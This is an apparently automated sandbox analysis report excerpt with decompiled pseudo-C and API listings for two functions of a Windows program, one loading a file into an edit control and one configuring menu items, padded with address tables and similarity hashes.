                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Rect$Object$ClipCreateDeleteFillIndirectSelect$ClientCombineInflateStock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 829014531-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 6200b81327dfea43ee9c050cc864e2eed230069342d055efe4a0762abe705bb0
                                                                                                                                                                                                                                                                                          • Instruction ID: 694f48f4c4f816e06a36c5ba2d7d0021b03cf1751e4d5d8e63e0e07acd19be3a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6200b81327dfea43ee9c050cc864e2eed230069342d055efe4a0762abe705bb0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84410C76D01218AFCB14DFA4DD85AEEBBB9EB4C750F108119F915E7680DB749D80CBA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                                                                                                                          			E000F8670(void* __ecx, void* __eflags, signed int _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				char _v280;
                                                                                                                                                                                                                                                                                          				CHAR* _v284;
                                                                                                                                                                                                                                                                                          				int _v292;
                                                                                                                                                                                                                                                                                          				void* _v296;
                                                                                                                                                                                                                                                                                          				void _v560;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                                                                                                          				signed int _t62;
                                                                                                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                                                                                                          				signed int _t98;
                                                                                                                                                                                                                                                                                          				CHAR* _t115;
                                                                                                                                                                                                                                                                                          				signed int _t127;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t47 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v12 = _t47 ^ _t127;
                                                                                                                                                                                                                                                                                          				_t125 = __ecx;
                                                                                                                                                                                                                                                                                          				_t121 = __ecx + 0x250;
                                                                                                                                                                                                                                                                                          				_t49 = E000F72C0(_t91, __ecx + 0x250);
                                                                                                                                                                                                                                                                                          				_t133 = _t49;
                                                                                                                                                                                                                                                                                          				if(_t49 != 0 || E000F7370(_t121, _t133) != 0) {
                                                                                                                                                                                                                                                                                          					_t91 = _t125 + 0x108;
                                                                                                                                                                                                                                                                                          					if(E000FB3E0(_t91, _t121, _a4 & 0x0000ffff,  &_v280) == 0) {
                                                                                                                                                                                                                                                                                          						MessageBeep(0x10);
                                                                                                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t115 =  &_v280;
                                                                                                                                                                                                                                                                                          					_v284 = _t115;
                                                                                                                                                                                                                                                                                          					_t57 = lstrlenA(_t115) - 1;
                                                                                                                                                                                                                                                                                          					if(_t57 < 0) {
                                                                                                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                                                                                                          						_t121 = CreateFileA( &_v280, 0x80000000, 0, 0, 3, 0x8000080, 0);
                                                                                                                                                                                                                                                                                          						if(_t121 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          							L17:
                                                                                                                                                                                                                                                                                          							MessageBoxA( *(_t125 + 4), "Error reading file!\n", 0x11293e, 0);
                                                                                                                                                                                                                                                                                          							_t98 =  *(_t91 + 4);
                                                                                                                                                                                                                                                                                          							_t114 = _a4 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							_t62 = _t98 - (_a4 & 0x0000ffff) + 0xe10f;
                                                                                                                                                                                                                                                                                          							__eflags = _t62;
                                                                                                                                                                                                                                                                                          							if(_t62 >= 0) {
                                                                                                                                                                                                                                                                                          								__eflags = _t62 - _t98;
                                                                                                                                                                                                                                                                                          								if(_t62 < _t98) {
                                                                                                                                                                                                                                                                                          									_t114 = _t98 - 1;
                                                                                                                                                                                                                                                                                          									__eflags = _t62 - _t98 - 1;
                                                                                                                                                                                                                                                                                          									if(_t62 != _t98 - 1) {
                                                                                                                                                                                                                                                                                          										__eflags = (_t98 - _t62) * 0x104;
                                                                                                                                                                                                                                                                                          										_t114 = _t62 * 0x104 +  *_t91 + 0x104;
                                                                                                                                                                                                                                                                                          										E000F1240((_t98 - _t62) * 0x104, _t62 * 0x104 +  *_t91, (_t98 - _t62) * 0x104, _t62 * 0x104 +  *_t91 + 0x104, (_t98 - _t62) * 0x104 - 0x104);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t44 = _t91 + 4;
                                                                                                                                                                                                                                                                                          									 *_t44 =  *(_t91 + 4) - 1;
                                                                                                                                                                                                                                                                                          									__eflags =  *_t44;
                                                                                                                                                                                                                                                                                          									_t125 = _t91;
                                                                                                                                                                                                                                                                                          									E000FD690(_t114, _t91);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L22:
                                                                                                                                                                                                                                                                                          							E000FB730(_t91, _t114, _t121);
                                                                                                                                                                                                                                                                                          							goto L24;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v296 = _t121;
                                                                                                                                                                                                                                                                                          						_v292 = 0;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t125 + 0x254), 0x449, 1,  &_v296);
                                                                                                                                                                                                                                                                                          						CloseHandle(_t121);
                                                                                                                                                                                                                                                                                          						if((0 | _v292 == 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						lstrcpyA(_t125 + 0x2a8,  &_v280);
                                                                                                                                                                                                                                                                                          						lstrcpyA(_t125 + 0x3ac, _v284);
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t125 + 0x254), 0xb9, 0, 0);
                                                                                                                                                                                                                                                                                          						_t121 = _t125;
                                                                                                                                                                                                                                                                                          						E000F8160(_t125);
                                                                                                                                                                                                                                                                                          						_t114 =  *(_t91 + 4);
                                                                                                                                                                                                                                                                                          						_t81 = _t114 - (_a4 & 0x0000ffff) + 0xe10f;
                                                                                                                                                                                                                                                                                          						if(_t81 < 0 || _t81 >= _t114) {
                                                                                                                                                                                                                                                                                          							goto L22;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t125 =  *_t91 + _t81 * 0x104;
                                                                                                                                                                                                                                                                                          							_v284 = _t125;
                                                                                                                                                                                                                                                                                          							_t82 = memcpy( &_v560, _t125, 0x41 << 2);
                                                                                                                                                                                                                                                                                          							_t121 = _t125 + 0x82;
                                                                                                                                                                                                                                                                                          							if(_t82 != _t114 - 1) {
                                                                                                                                                                                                                                                                                          								E000F1240(_t114, _v284, _t114,  &(_v284[0x104]), _t114 - 0x104);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							 *(_t91 + 4) =  *(_t91 + 4) - 1;
                                                                                                                                                                                                                                                                                          							if(E000FD980( &_v560, _t91) == 0) {
                                                                                                                                                                                                                                                                                          								goto L22;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t125 = _t91;
                                                                                                                                                                                                                                                                                          								E000FD690(_t114, _t91);
                                                                                                                                                                                                                                                                                          								E000FB730(_t91, _t114, _t121);
                                                                                                                                                                                                                                                                                          								goto L24;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						while( *((intOrPtr*)(_t127 + _t57 - 0x114)) != 0x5c) {
                                                                                                                                                                                                                                                                                          							_t57 = _t57 - 1;
                                                                                                                                                                                                                                                                                          							if(_t57 >= 0) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v284 = _t127 + _t57 - 0x113;
                                                                                                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					L24:
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t91, _v12 ^ _t127, _t114, _t121, _t125);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                                          0x000f8679
                                                                                                                                                                                                                                                                                          0x000f8680
                                                                                                                                                                                                                                                                                          0x000f8685
                                                                                                                                                                                                                                                                                          0x000f8688
                                                                                                                                                                                                                                                                                          0x000f8690
                                                                                                                                                                                                                                                                                          0x000f8695
                                                                                                                                                                                                                                                                                          0x000f8697
                                                                                                                                                                                                                                                                                          0x000f86b1
                                                                                                                                                                                                                                                                                          0x000f86bf
                                                                                                                                                                                                                                                                                          0x000f88a9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f88a9
                                                                                                                                                                                                                                                                                          0x000f86c5
                                                                                                                                                                                                                                                                                          0x000f86ce
                                                                                                                                                                                                                                                                                          0x000f86da
                                                                                                                                                                                                                                                                                          0x000f86db
                                                                                                                                                                                                                                                                                          0x000f86fb
                                                                                                                                                                                                                                                                                          0x000f871a
                                                                                                                                                                                                                                                                                          0x000f871f
                                                                                                                                                                                                                                                                                          0x000f8839
                                                                                                                                                                                                                                                                                          0x000f8849
                                                                                                                                                                                                                                                                                          0x000f884f
                                                                                                                                                                                                                                                                                          0x000f8852
                                                                                                                                                                                                                                                                                          0x000f885a
                                                                                                                                                                                                                                                                                          0x000f885a
                                                                                                                                                                                                                                                                                          0x000f885f
                                                                                                                                                                                                                                                                                          0x000f8861
                                                                                                                                                                                                                                                                                          0x000f8863
                                                                                                                                                                                                                                                                                          0x000f8865
                                                                                                                                                                                                                                                                                          0x000f8868
                                                                                                                                                                                                                                                                                          0x000f886a
                                                                                                                                                                                                                                                                                          0x000f8876
                                                                                                                                                                                                                                                                                          0x000f8883
                                                                                                                                                                                                                                                                                          0x000f888c
                                                                                                                                                                                                                                                                                          0x000f8891
                                                                                                                                                                                                                                                                                          0x000f8894
                                                                                                                                                                                                                                                                                          0x000f8894
                                                                                                                                                                                                                                                                                          0x000f8894
                                                                                                                                                                                                                                                                                          0x000f8897
                                                                                                                                                                                                                                                                                          0x000f8899
                                                                                                                                                                                                                                                                                          0x000f8899
                                                                                                                                                                                                                                                                                          0x000f8863
                                                                                                                                                                                                                                                                                          0x000f889e
                                                                                                                                                                                                                                                                                          0x000f88a0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f88a0
                                                                                                                                                                                                                                                                                          0x000f873a
                                                                                                                                                                                                                                                                                          0x000f8740
                                                                                                                                                                                                                                                                                          0x000f874a
                                                                                                                                                                                                                                                                                          0x000f8751
                                                                                                                                                                                                                                                                                          0x000f8764
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f877e
                                                                                                                                                                                                                                                                                          0x000f878e
                                                                                                                                                                                                                                                                                          0x000f87a0
                                                                                                                                                                                                                                                                                          0x000f87a6
                                                                                                                                                                                                                                                                                          0x000f87a8
                                                                                                                                                                                                                                                                                          0x000f87ad
                                                                                                                                                                                                                                                                                          0x000f87b8
                                                                                                                                                                                                                                                                                          0x000f87bd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f87cb
                                                                                                                                                                                                                                                                                          0x000f87d5
                                                                                                                                                                                                                                                                                          0x000f87e2
                                                                                                                                                                                                                                                                                          0x000f87e8
                                                                                                                                                                                                                                                                                          0x000f87e8
                                                                                                                                                                                                                                                                                          0x000f87ef
                                                                                                                                                                                                                                                                                          0x000f880f
                                                                                                                                                                                                                                                                                          0x000f8814
                                                                                                                                                                                                                                                                                          0x000f8817
                                                                                                                                                                                                                                                                                          0x000f8827
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f8829
                                                                                                                                                                                                                                                                                          0x000f8829
                                                                                                                                                                                                                                                                                          0x000f882b
                                                                                                                                                                                                                                                                                          0x000f8832
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f8832
                                                                                                                                                                                                                                                                                          0x000f8827
                                                                                                                                                                                                                                                                                          0x000f86dd
                                                                                                                                                                                                                                                                                          0x000f86e0
                                                                                                                                                                                                                                                                                          0x000f86e9
                                                                                                                                                                                                                                                                                          0x000f86ea
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f86ec
                                                                                                                                                                                                                                                                                          0x000f86f5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f86f5
                                                                                                                                                                                                                                                                                          0x000f88af
                                                                                                                                                                                                                                                                                          0x000f88af
                                                                                                                                                                                                                                                                                          0x000f88c1
                                                                                                                                                                                                                                                                                          0x000f88c1

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F72C0: SendMessageA.USER32(?,000000B8,00000000,00000000), ref: 000F72E4
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F72C0: GetParent.USER32(?), ref: 000F72F2
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F72C0: wsprintfA.USER32 ref: 000F730D
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F72C0: MessageBoxA.USER32 ref: 000F7325
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 000F86D4
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,08000080,00000000,?,?,?), ref: 000F8714
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000449,00000001,?), ref: 000F874A
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 000F8751
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?,?,?,?), ref: 000F877E
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?,?,?,?), ref: 000F878E
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B9,00000000,00000000), ref: 000F87A0
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F7370: GetActiveWindow.USER32 ref: 000F73AF
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F7370: lstrcpyA.KERNEL32(?,?), ref: 000F73EB
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F7370: lstrcpyA.KERNEL32(?,?), ref: 000F73F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F7370: SendMessageA.USER32(?,000000B9,00000000,00000000), ref: 000F7404
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FD980: __recalloc.LIBCMT ref: 000FD9CB
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FB730: RegCloseKey.ADVAPI32(?,?,?), ref: 000FB789
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$Sendlstrcpy$Close$ActiveCreateFileHandleParentWindow__recalloclstrlenwsprintf
                                                                                                                                                                                                                                                                                          • String ID: Error reading file!
                                                                                                                                                                                                                                                                                          • API String ID: 862393817-1254819211
                                                                                                                                                                                                                                                                                          • Opcode ID: f35032a6709b921e6580fb0ffefe98971cb200b7118beebeef391da74384e394
                                                                                                                                                                                                                                                                                          • Instruction ID: d525cbf8e40091099c8f3cc7e8e6eda77b3c4f428af03b75c12a5e92ff4ec830
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f35032a6709b921e6580fb0ffefe98971cb200b7118beebeef391da74384e394
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8251297160021CABDB189F24CD85BF9B7A9BB48700F04C569FB09DB581EFB4E985DB50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                          			E000F51B0(struct HMENU__* __ebx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                                                                          				signed short* _v172;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v220;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v268;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                                                                                                          				signed int _t66;
                                                                                                                                                                                                                                                                                          				intOrPtr _t73;
                                                                                                                                                                                                                                                                                          				signed short* _t78;
                                                                                                                                                                                                                                                                                          				int _t92;
                                                                                                                                                                                                                                                                                          				signed short* _t93;
                                                                                                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t77 = __ebx;
                                                                                                                                                                                                                                                                                          				_t55 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v12 = _t55 ^ _t94;
                                                                                                                                                                                                                                                                                          				_t57 = _a4;
                                                                                                                                                                                                                                                                                          				_t93 =  *(_t57 + 0x10);
                                                                                                                                                                                                                                                                                          				if(_t93 != 0) {
                                                                                                                                                                                                                                                                                          					_t78 =  *(_t57 + 0xc);
                                                                                                                                                                                                                                                                                          					_t58 =  *_t78 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					_t88 = 0xffff;
                                                                                                                                                                                                                                                                                          					_v172 = _t78;
                                                                                                                                                                                                                                                                                          					while(_t58 != 0xffff) {
                                                                                                                                                                                                                                                                                          						if((_t78[1] & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                          							_t92 = _t58 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							if(( *_t93 & 0x00004000) != 0) {
                                                                                                                                                                                                                                                                                          								SetMenuDefaultItem(_t77, 0xffffffff, 0);
                                                                                                                                                                                                                                                                                          								 *_t93 =  *_t93 & 0x0000bfff;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							E00106820( &_v220, 0, 0x30);
                                                                                                                                                                                                                                                                                          							_v220.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          							E00106820( &(_v168.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          							_t95 = _t95 + 0x18;
                                                                                                                                                                                                                                                                                          							_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          							if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                                                                                                          								_v220.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t73 = _v168.dwMajorVersion;
                                                                                                                                                                                                                                                                                          								if(_t73 < 5 && (_t73 != 4 || _v168.dwMinorVersion < 0x5a)) {
                                                                                                                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t66 =  *_t93 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							_v220.fMask = 1;
                                                                                                                                                                                                                                                                                          							_v220.wID = _t92;
                                                                                                                                                                                                                                                                                          							if((_t66 & 0x00000100) != 0) {
                                                                                                                                                                                                                                                                                          								_v220.fState = _v220.fState | 0x00000003;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							if((_t66 & 0x00000200) != 0) {
                                                                                                                                                                                                                                                                                          								_v220.fState = _v220.fState | 0x00000008;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							if((_t66 & 0x00001000) != 0) {
                                                                                                                                                                                                                                                                                          								_v220.fState = _v220.fState | 0x00001000;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							if((_t66 & 0x00002000) != 0) {
                                                                                                                                                                                                                                                                                          								E00106820( &_v268, 0, 0x30);
                                                                                                                                                                                                                                                                                          								_t95 = _t95 + 0xc;
                                                                                                                                                                                                                                                                                          								_v268.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          								if(E000F4890(_t77, _t92, _t93) != 0) {
                                                                                                                                                                                                                                                                                          									_v268.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v268.fMask = 0x10;
                                                                                                                                                                                                                                                                                          								_v268.wID = _t92;
                                                                                                                                                                                                                                                                                          								if(GetMenuItemInfoA(_t77, _t92, 0,  &_v268) != 0) {
                                                                                                                                                                                                                                                                                          									_v220.fMask = _v220.fMask | 0x00000010;
                                                                                                                                                                                                                                                                                          									_v220.fType = _v220.fType | _v268.fType & 0xfffff7fb;
                                                                                                                                                                                                                                                                                          									_v220.dwTypeData = _t93[2];
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							SetMenuItemInfoA(_t77, _t92, 0,  &_v220);
                                                                                                                                                                                                                                                                                          							_t78 = _v172;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t58 = _t78[2] & 0x0000ffff;
                                                                                                                                                                                                                                                                                          						_t78 =  &(_t78[2]);
                                                                                                                                                                                                                                                                                          						_t88 = 0xffff;
                                                                                                                                                                                                                                                                                          						_t93 =  &(_t93[4]);
                                                                                                                                                                                                                                                                                          						_v172 = _t78;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t77, _v12 ^ _t94, _t88, _t92, _t93);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return E001059E6( &(_t93[0]), __ebx, _v12 ^ _t94, __edx, _t92, _t93);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                                          0x000f51b0
                                                                                                                                                                                                                                                                                          0x000f51b9
                                                                                                                                                                                                                                                                                          0x000f51c0
                                                                                                                                                                                                                                                                                          0x000f51c3
                                                                                                                                                                                                                                                                                          0x000f51c7
                                                                                                                                                                                                                                                                                          0x000f51cd
                                                                                                                                                                                                                                                                                          0x000f51e4
                                                                                                                                                                                                                                                                                          0x000f51e7
                                                                                                                                                                                                                                                                                          0x000f51ea
                                                                                                                                                                                                                                                                                          0x000f51ef
                                                                                                                                                                                                                                                                                          0x000f51f8
                                                                                                                                                                                                                                                                                          0x000f5202
                                                                                                                                                                                                                                                                                          0x000f5208
                                                                                                                                                                                                                                                                                          0x000f5213
                                                                                                                                                                                                                                                                                          0x000f521a
                                                                                                                                                                                                                                                                                          0x000f5225
                                                                                                                                                                                                                                                                                          0x000f5225
                                                                                                                                                                                                                                                                                          0x000f5233
                                                                                                                                                                                                                                                                                          0x000f5249
                                                                                                                                                                                                                                                                                          0x000f5253
                                                                                                                                                                                                                                                                                          0x000f5258
                                                                                                                                                                                                                                                                                          0x000f5262
                                                                                                                                                                                                                                                                                          0x000f5274
                                                                                                                                                                                                                                                                                          0x000f528f
                                                                                                                                                                                                                                                                                          0x000f528f
                                                                                                                                                                                                                                                                                          0x000f5276
                                                                                                                                                                                                                                                                                          0x000f5276
                                                                                                                                                                                                                                                                                          0x000f527f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f527f
                                                                                                                                                                                                                                                                                          0x000f5299
                                                                                                                                                                                                                                                                                          0x000f529c
                                                                                                                                                                                                                                                                                          0x000f52a6
                                                                                                                                                                                                                                                                                          0x000f52b1
                                                                                                                                                                                                                                                                                          0x000f52b3
                                                                                                                                                                                                                                                                                          0x000f52b3
                                                                                                                                                                                                                                                                                          0x000f52bf
                                                                                                                                                                                                                                                                                          0x000f52c1
                                                                                                                                                                                                                                                                                          0x000f52c1
                                                                                                                                                                                                                                                                                          0x000f52cd
                                                                                                                                                                                                                                                                                          0x000f52cf
                                                                                                                                                                                                                                                                                          0x000f52cf
                                                                                                                                                                                                                                                                                          0x000f52de
                                                                                                                                                                                                                                                                                          0x000f52eb
                                                                                                                                                                                                                                                                                          0x000f52f0
                                                                                                                                                                                                                                                                                          0x000f52f3
                                                                                                                                                                                                                                                                                          0x000f5304
                                                                                                                                                                                                                                                                                          0x000f5306
                                                                                                                                                                                                                                                                                          0x000f5306
                                                                                                                                                                                                                                                                                          0x000f531b
                                                                                                                                                                                                                                                                                          0x000f5325
                                                                                                                                                                                                                                                                                          0x000f5333
                                                                                                                                                                                                                                                                                          0x000f533e
                                                                                                                                                                                                                                                                                          0x000f534b
                                                                                                                                                                                                                                                                                          0x000f5351
                                                                                                                                                                                                                                                                                          0x000f5351
                                                                                                                                                                                                                                                                                          0x000f5333
                                                                                                                                                                                                                                                                                          0x000f5362
                                                                                                                                                                                                                                                                                          0x000f5368
                                                                                                                                                                                                                                                                                          0x000f5368
                                                                                                                                                                                                                                                                                          0x000f536e
                                                                                                                                                                                                                                                                                          0x000f5372
                                                                                                                                                                                                                                                                                          0x000f5375
                                                                                                                                                                                                                                                                                          0x000f537a
                                                                                                                                                                                                                                                                                          0x000f537d
                                                                                                                                                                                                                                                                                          0x000f5383
                                                                                                                                                                                                                                                                                          0x000f539d
                                                                                                                                                                                                                                                                                          0x000f51cf
                                                                                                                                                                                                                                                                                          0x000f51e1
                                                                                                                                                                                                                                                                                          0x000f51e1

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 000F521A
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000F5233
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000F5253
                                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?), ref: 000F526C
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000F52EB
                                                                                                                                                                                                                                                                                          • GetMenuItemInfoA.USER32 ref: 000F532B
                                                                                                                                                                                                                                                                                          • SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 000F5362
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
